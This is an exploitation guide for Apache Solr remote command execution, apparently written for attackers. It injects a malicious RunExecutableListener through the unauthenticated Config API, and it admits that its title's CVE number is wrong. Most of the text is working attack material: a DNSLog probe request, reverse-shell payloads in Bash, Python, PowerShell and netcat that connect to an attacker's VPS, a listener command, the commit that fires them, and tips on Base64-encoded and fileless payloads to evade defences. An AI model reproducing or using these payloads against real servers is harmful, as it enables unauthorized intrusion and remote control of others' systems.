CVE-2021-27905 exploitation notes (Apache Solr RCE)
📌 Vulnerability summary
- CVE ID in the title: CVE-2021-27905
- Component: Apache Solr Config API, `solr.RunExecutableListener`
- Type: remote command execution (RCE)
- Preconditions: the Config API (`/solr/{core}/config`) is reachable without authentication and `RunExecutableListener` is still available on the target (it is disabled by default from Solr 7.1 onward). The attacker registers a malicious `RunExecutableListener` through the `add-listener` command; the command runs when the listener's event fires, not when the listener is registered.
- Correction: the CVE number does not match the technique. CVE-2021-27905 is an SSRF in Solr's ReplicationHandler (`masterUrl` / `leaderUrl`, fixed in 8.8.2). Injecting a `RunExecutableListener` via the Config API is the older RCE tracked as CVE-2017-12629, and the DataImportHandler (DIH) is not involved in it at all (the DIH has its own RCE, CVE-2019-0193, through the `dataConfig` parameter). The payloads below target the Config API, so treat the title's CVE ID as a mislabel.
✅ 1. Detecting the vulnerability with DNSLog
📌 Request (DNSLog probe)
`RunExecutableListener` hands `exe` and `args` straight to `Runtime.exec(String[])`, which does not split on spaces, so the hostname must go in `args` rather than being appended to `exe`.
```json
{
"method": "POST",
"url": "http://www.example.com/solr/{core}/config",
"headers": {
"Content-Type": "application/json"
},
"body": {
"add-listener": {
"event": "newSearcher",
"name": "dnslog_test",
"class": "solr.RunExecutableListener",
"exe": "nslookup",
"args": ["test.dnslog.cn"]
}
}
}
```
A successful registration returns `"responseHeader":{"status":0}` and the entry is persisted in the core's `configoverlay.json`. Nothing runs yet: `newSearcher` fires when a new searcher is opened, so trigger it with a hard commit, e.g. `POST /solr/{core}/update` with body `{"commit":{}}` (or `?commit=true`).
📌 Interpreting the result
| Observation | Interpretation |
|---|---|
| DNSLog shows a lookup for the probe hostname | ✅ The command executed; the target is vulnerable |
| No DNSLog record | ❌ Either patched / listener disabled, the event has not fired yet (no commit after registration), or outbound DNS from the Solr host is blocked; check `GET /solr/{core}/config` for the `listener` entry before concluding the target is safe |
✅ 2. Reverse shell POCs (Linux & Windows)
Each body below is POSTed to `/solr/{core}/config` exactly like the DNSLog probe, followed by a commit to fire the event.
📌 Linux Bash reverse shell
```json
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "/bin/bash",
"args": [
"-c",
"bash -i >& /dev/tcp/YOUR-VPS-IP/4444 0>&1"
]
}
}
```
📌 Python reverse shell
```json
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "python3",
"args": [
"-c",
"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-VPS-IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
]
}
}
```
📌 Windows PowerShell reverse shell
Every element of `args` becomes one argv entry, so switch and value must be separate elements (`"-W", "Hidden"`), not a single `"-W Hidden"` string.
```json
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "powershell",
"args": [
"-NoP",
"-NonI",
"-W",
"Hidden",
"-Exec",
"Bypass",
"-Command",
"$client = New-Object System.Net.Sockets.TCPClient('YOUR-VPS-IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
]
}
}
```
📌 Netcat reverse shell (Linux)
`-e` exists only in traditional netcat and Nmap's `ncat`; the OpenBSD `nc` shipped by many distributions rejects it. On Windows you would need an `nc.exe` on the target and `cmd.exe` instead of `/bin/sh`.
```json
{
"add-listener": {
"event": "newSearcher",
"name": "reverse_shell",
"class": "solr.RunExecutableListener",
"exe": "nc",
"args": [
"YOUR-VPS-IP",
"4444",
"-e",
"/bin/sh"
]
}
}
```
✅ 3. Catching the reverse shell
Listen on port 4444 on your VPS before triggering the commit:
```bash
nc -lvnp 4444
```
📌 Parameters
| Parameter | Meaning |
|---|---|
| www.example.com | Target Solr host (IP or domain; Solr's default port is 8983) |
| {core} | Target Solr core name (e.g. mycore) |
| YOUR-VPS-IP | Public IP of your VPS |
| 4444 | Listening port (change as needed) |
🚀 Stealthier payloads (Base64 encoding, fileless execution)
If the target has defensive controls, the shell one-liner can be Base64-encoded and decoded at runtime (`bash -c "echo <b64> | base64 -d | bash"`), or a fileless loader can be used; adjust to the situation. Remember that the listener is written to the core's `configoverlay.json` and runs again on every matching event, so remove it with the Config API `delete-listener` command (by `name`) once you are done.